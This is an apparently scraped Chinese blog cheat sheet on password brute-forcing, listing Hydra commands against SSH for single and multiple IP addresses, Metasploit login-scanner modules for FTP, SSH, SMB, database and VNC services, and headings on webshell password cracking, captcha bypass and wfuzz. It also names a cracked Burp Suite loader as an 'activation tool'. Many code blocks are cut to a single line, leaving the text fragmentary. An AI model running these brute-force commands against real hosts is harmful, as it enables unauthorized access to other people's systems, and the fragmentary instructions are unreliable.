穷举
常见端口
1 | 1,web类(web漏洞/敏感目录) |
Hydra
1 | -R 继续从上一次进度接着破解。 |
1 | hydra -l root -P password.txt ssh://***.***.***.*** -vV -t 15 |
1 | [STATUS] attack finished for ***.***.***.*** (waiting for children to complete tests) |
指定多个ip进行穷举 导入-M IP地址文件
1 | hydra -l root -P password.txt -M ip.txt ssh -o IPS.txt |
1 | hydra -L /root/user -P /root/passwd ssh://192.168.1.0 -f -o /root/crack.txt -V |
可视化xhydra
没啥好说的,
msf穷举模块
测试ip:***********
测试账号:test
测试密码:123456
1 | msf6 > use auxiliary/scanner/ssh/ssh_login |
1 | msf6 > use auxiliary/scanner/ssh/ssh_login |
1 | auxiliary/scanner/ftp/ftp_login auxiliary/scanner/ssh/ssh_login auxiliary/scanner/telnet/telnet_login auxiliary/scanner/smb/smb_login auxiliary/scanner/mssql/mssql_login auxiliary/scanner/mysql/mysql_login auxiliary/scanner/oracle/oracle_login auxiliary/scanner/postgres/postgres_login auxiliary/scanner/vnc/vnc_login auxiliary/scanner/pcanywhere/pcanywhere_login auxiliary/scanner/snmp/snmp_login |
邮箱破解
后台密码穷举
1 | 源代码 就是 |
把下载的burp文件重命名如下
该exe使用方法
- 创建快捷方式
- 固定到开始屏幕
burploader-old.jar 为激活工具
1 | java -jar burploader-old.jar |
使用方法🔰雨苁博客有
wordpress
- cmsmap穷举
一句话破解
- cheetah
webshell密码破解
验证码后台破解
- 验证码cookie是否能重复利用
- 能否重复利用
- 绕过
- ocr识别
wfuzz多线程百万密码测试
1 | #example |
有 token 防御的网站后台
评论